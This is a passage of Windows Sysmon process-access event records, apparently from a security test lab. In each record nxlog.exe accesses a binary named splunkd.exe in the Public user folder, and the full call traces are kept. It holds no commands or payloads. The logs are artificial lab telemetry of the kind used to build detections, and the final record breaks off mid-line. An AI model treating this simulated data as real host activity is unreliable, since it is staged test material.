{"EventTime":"2020-08-01 06:56:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6316,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:36.539\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:36.539","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6317,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:37.539\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:37.539","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6318,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:38.539\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:38.539","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6319,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:39.540\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:39.540","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6320,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:40.540\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:40.540","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6321,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:41.540\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:41.540","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6322,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:42.540\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 